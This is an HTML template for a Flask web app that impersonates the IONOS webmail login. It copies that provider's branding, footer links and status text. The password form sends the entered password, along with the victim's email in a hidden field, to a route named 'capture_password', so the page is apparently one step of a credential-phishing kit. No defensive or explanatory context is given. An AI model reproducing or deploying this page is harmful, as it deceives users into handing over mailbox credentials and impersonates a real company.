<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="stylesheet"
      href="{{ url_for('static', filename='css/password.css') }} "
    />
    <link rel="shortcut icon" type="image/x-icon" href="{{ url_for('static',
    filename="favicon/favicon.ico" ) }}"/>
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css"
    />
    <link rel="stylesheet" type="text/css" href="" />
    <link rel="stylesheet" type="text/css" href="" />

    <title>Webmail-Login</title>
  </head>
  <body>
    <header class="header">
      <div class="logo-tag">
        <img src="{{ url_for('static', filename="Photo/logo.png")}}"
        class="logo" />
        <span>WEBMAIL-LOGIN</span>
      </div>
      <div class="input-bar">
        <i class="bi bi-search search-icon"></i>
        <input
          class="oao-navi-search-input search"
          type="search"
          placeholder="Nach Funktionen, Domains und Hilfe suchen"
        />
        <i class="bi bi-mic-fill mic-icon"></i>
      </div>
      <div class="icon-chat">
        <svg
          width="47px"
          height="30px"
          stroke-width="1.5"
          viewBox="2 2 24 23"
          fill="none"
          xmlns="http://www.w3.org/2000/svg"
          color="#000000"
          class="icon-chat-box"
        >
          <path
            d="M9 9C9 5.49997 14.5 5.5 14.5 9C14.5 11.5 12 10.9999 12 13.9999"
            stroke="#000000"
            stroke-width="1.5"
            stroke-linecap="round"
            stroke-linejoin="round"
          ></path>
          <path
            d="M12 18.01L12.01 17.9989"
            stroke="#000000"
            stroke-width="2.5"
            stroke-linecap="round"
            stroke-linejoin="round"
          ></path>
          <path
            d="M12 22C17.5228 22 22 17.5228 22 12C22 6.47715 17.5228 2 12 2C6.47715 2 2 6.47715 2 12C2 13.8214 2.48697 15.5291 3.33782 17L2.5 21.5L7 20.6622C8.47087 21.513 10.1786 22 12 22Z"
            stroke="#000000"
            stroke-width="1.5"
            stroke-linecap="round"
            stroke-linejoin="round"
          ></path>
        </svg>
      </div>
    </header>

    <div class="container">
      <form
        class="form"
        id="form"
        method="POST"
        action="{{ url_for('capture_password') }}"
      >
        <input type="hidden" name="email" value="{{ email }}" />
        <div class="img-tag">
          <img src="{{ url_for('static', filename="Photo/password.svg")}}"
          class="img" />
                                                              <h2>Enter Password</h2>

                                                              
        </div>
        <div class="input-email">
          <label for="password"Passwort</label>
          <input
            type="password"
            name="password"
            id="password"
            value="{{ password }}"
            required
          />
          <p class="input-title">
            Not your device? Log out after your session or use private browsing mode.
            <span><a href="" class="span"> Private browsing mode.</a></span>
          </p>
          <div class="enter">
            <button type="submit" class="btn">Validate</button>
          </div>
        </div>
        <div class="form-footer"></div>
      </form>
    </div>

    <footer class="footer">
      <div>
        <span class="circle"></span>
        <a
          href="https://www.ionos-status.de/?utm_medium=footer&utm_content=none&utm_source=LOGIN_ID&utm_campaign=identifier&utm_term=no_search"
          >All systems functional</a
        >
      </div>
      <div>
        <span
          >© 2025<a href="https://www.ionos.de/unternehmen">IONOS Inc</a></span
        >
      </div>
      <div>
        <span><a href="https://www.ionos.de/impressum">Imprint</a> - </span>
        <span
          ><a href="https://www.ionos.de/terms-gtc/terms-privacy"
            >Data Protection</a
          >
          -
        </span>
        <span><a href="https://www.ionos.de/terms-gtc">T&Cs</a></span>
      </div>
    </footer>
    <script src="main.js"></script>
  </body>
</html>
